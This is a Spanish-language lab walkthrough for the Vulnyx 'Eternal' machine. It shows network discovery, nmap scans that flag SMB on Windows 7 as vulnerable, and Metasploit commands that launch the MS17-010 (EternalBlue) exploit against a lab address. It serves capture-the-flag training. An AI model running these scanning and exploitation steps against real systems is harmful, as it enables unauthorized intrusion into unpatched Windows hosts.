Máquina Eternal (Vulnyx)
$ netdiscover -i eth1 -r 10.0.2.0/24
- Kali (Máquina Atacante): 10.0.2.4
- Máquina Victima: 10.0.2.18
Comprobamos si tenemos conexión con la Máquina Victima, para ello ejecutaremos el siguiente comando:
$ ping -c 1 10.0.2.18
Como se puede comprobar por el TTL nos enfrentamos a una Máquina Windows.
A continuación, realizamos con la herramienta nmap un reconocimiento de los servicios, para ello ejecutamos el siguiente comando:
$ nmap -Pn 10.0.2.18 -sVC
Como podemos comprobar la Máquina Victima tiene abiertos los puertos 135, 139, 445, 5357, 49152, 49153, 49154, 49155, 49156, 49157; y nos confirma que se trata de una Máquina con Windows 7.
A continuación, comprobamos si el servicio que corre por el puerto 445 (smb) es vulnerable su versión, para ello usaremos el script vuln de nmap, para ello ejecutaremos el siguiente comando:
$ nmap -p 445 10.0.2.18 --script vuln
Y comprobamos que es vulnerable.
A continuación, haremos uso de la herramienta Metasploit, para ello ejecutamos el siguiente comando para arrancarla:
$ msfconsole
Buscamos este exploit, para ello ejecutamos el siguiente comando dentro de la consola de Metasploit:
msf6> search ms17-010
msf6> use 0
msf6> set RHOSTS 10.0.2.18
msf6> run




